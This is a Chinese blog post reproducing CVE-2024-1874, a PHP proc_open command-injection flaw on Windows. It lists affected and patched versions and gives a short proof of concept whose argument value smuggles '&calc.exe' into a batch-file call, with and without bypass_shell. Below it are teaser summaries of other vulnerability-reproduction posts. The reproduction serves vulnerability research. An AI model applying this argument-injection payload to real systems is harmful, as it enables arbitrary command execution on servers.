PHP命令执行漏洞CVE-2024-1874复现

最新推荐文章于 2024-09-19 11:50:12 发布

A1andNS

最新推荐文章于 2024-09-19 11:50:12 发布

阅读量1.1k

点赞数 3

CC 4.0 BY-SA版权

文章标签： php 开发语言

本文链接：https://blog.csdn.net/qq_26139045/article/details/137887141

本文介绍了PHP8.2.9及更低版本中的CVE-2024-1874漏洞，允许攻击者通过proc_open函数执行恶意代码，包括调用外部程序如计算器，即使设置了bypass_shell选项。文章详细展示了漏洞利用方法和可能的修复措施。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

CVE-2024-1874 PHP命令执行漏洞

影响版本

Affected versions
< 8.1.28
< 8.2.18
< 8.3.5
Patched versions
8.1.28
8.2.18
8.3.6

POC

创建一个文件test.php


<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes);
proc_close($proc);

随便创建一个.bat文件，如test.bat

echo test

然后在PHP 8.2.9nts版本下使用php test.php来执行test.php，成功RCE调起计算器。
在这里插入图片描述
即使在proc_open()函数中使用bypass shell选项，依旧RCE成功。

<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true));
proc_close($proc);

在这里插入图片描述

参考链接

https://mp.weixin.qq.com/s/jAeRY-XOKw8fmUDXT2ESNQ

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

A1andNS

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Apache OFBiz系统ProgramExport接口存在远程命令执行漏洞CVE-2024-38856 附POC

nnn2188185的博客

08-07

308

Apache OFBiz系统ProgramExport接口存在远程命令执行漏洞CVE-2024-38856 附POC

PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)

0xSec

06-08

3895

2024年6月，PHP官方发布新版本，修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件，易于利用，且默认情况下可获取操作系统权限，建议所有使用受影响版本的企业尽快升级修复，以确保安全。

1 条评论您还未登录，请先登录后发表或查看评论

【CVE-2024-】PHP CGI Windows平台远程代码执行漏洞

Lucker_YYY的博客

08-18

813

具体操作为：编辑 /xampp/apache/conf/extra/httpd-xampp.conf，注释掉 ScriptAlias /php-cgi/ "C:/xampp/php/"。可以看出，此漏洞对于环境要求比较苛刻，但是对于使用XAMPP默认配置搭建的PHP Web服务（Windows默认配置部署时，满足以上所有条件），攻击者可利用该漏洞执行任意命令，控制服务器。本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。

PHP代码审计之反序列化攻击链CVE-2019-6340漏洞研究

shelter1234567的博客

12-24

1930

简简单单介绍下php的反序列化漏洞。

cve漏洞复现php,CVE-2016-7124php反序列化漏洞复现

weixin_42557830的博客

03-19

500

CVE-2016-7124php反序列化漏洞复现0X00漏洞原因如果存在__wakeup方法，调用 unserilize() 方法前则先调用__wakeup方法，但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行0X01漏洞影响版本PHP5 < 5.6.25PHP7 < 7.0.100X02漏洞详情PHP(PHP：HypertextPreproce...

php反序列化cve漏洞复现,CVE-2016-7124php反序列化漏洞复现

weixin_30871011的博客

04-08

541

php定时执行代码漏洞_PHP远程代码执行漏洞(CVE201911043)复现

weixin_39755873的博客

01-10

361

漏洞详情漏洞说明#‍‍‍‍‍‍是一个远程代码执行漏洞，使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞，可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时，服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发‍‍‍‍‍‍漏洞编号#CVE-2019-11043影响范围#在 Nginx + PHP-FPM 环境下，...

exp:CVE-2024-2961将phpfilter任意文件读取提升为远程代码执行（RCE）

10-30

CVE-2024-2961是一个网络上的安全漏洞，其存在于phpfilter组件中。在评估和利用这个漏洞的过程中，研究者们发现了一个问题，原本认为仅能造成任意文件读取的安全漏洞，经过深入分析和利用，实际上能够提升为远程代码...

漏洞复现-PHP-CGI Windows平台远程代码执行漏洞（CVE-2024-4577）

玄道的网安博客

08-12

1920

语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性，当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时，威胁者可构造恶意请求绕过CVE-2012-1823的保护，通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性，你可以通过传%ad来传入一个"-"，这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的，我们把视角还是回到php-cgi上。

紧急通告VMware vCenter高危漏洞CVE-2024-38812和CVE-2024-38813修复方案

我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士，专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略，致力于优化企业的IT环境。

09-19

2005

紧急通告VMware vCenter高危漏洞CVE-2024-38812和CVE-2024-38813修复方案

ThinkPHP漏洞合集（专注渗透视角）

热门推荐

LainWith的博客

04-11

1万+

服务框架是指某领域一类服务的可复用设计与不完整的实现，与软件框架不同的是，服务框架同时体现着面向服务，一个服务框架可以分为两个主要部分：服务引擎、引入的外部服务。ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据，渐渐成为单位公共安全中最具有战略性的资产，框架的安全稳定运行也直接决定着业务系统能否正常使用。

ThinkPHP6 任意文件操作漏洞分析

bylfsj的博客

02-15

2807

公众号：https://mp.weixin.qq.com/s/UPu6cE20l24T6fkYOlSUJw 漏洞介绍 2020年1月10日，ThinkPHP团队发布一个补丁更新，修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件，在特定情况下还可以getshell。具体受影响版本为ThinkPHP6.0....

4大典型安全漏洞是怎么来的？如何解决？

simplilearnCN的博客

03-16

6679

关于防御网络攻击，最好的防御就是强有力的出击。首先，必须使用适当的工具和流程（如漏洞扫描程序和威胁检测技术）来识别潜在的漏洞和威胁。确定漏洞和威胁后，分析确定它们的优先级，按重要性顺序消除或减轻它们。

蓝网科技临床浏览系统 deleteStudy SQL注入漏洞复现(CVE-2024-4257)

0xSec

04-29

1750

蓝网科技临床浏览系统 deleteStudy接口处SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。

【CVE复现计划】CVE-2024-0195

m0_63138919的博客

04-05

1737

本文以春秋云镜为靶场，进行该CVE-2024-0195的漏洞原理学习，记录自己学习过程，还请大佬们师傅们指出文中错误

WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)

0xSec

05-01

1881

WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞，该漏洞源于插件的用户身份验证机制，威胁者可以绕过该机制执行恶意SQL查询，将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件，并可能完全控制受影响的网站。

Progress Kemp LoadMaster 远程命令执行漏洞复现(CVE-2024-1212)

0xSec

05-01

1261

Progress Kemp LoadMaster 存在远程命令执行漏洞，未经身份验证的远程攻击者可可利用此类洞写入后门文件执行任意命令，导致服务器被控。

福建科立讯通信指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621、CVE-2024-2622、CVE-2024-2566)

0xSec

03-22

1344

福建科立讯通信指挥调度管理平台 down_file.php、pwd_update.php、editemedia.php、get_extension_yl.php、get_extension_yl.php等接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)

0xSec

05-05

1023

WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞，该漏洞源于对用户提供的参数转义不足，导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。

CVE-2024复现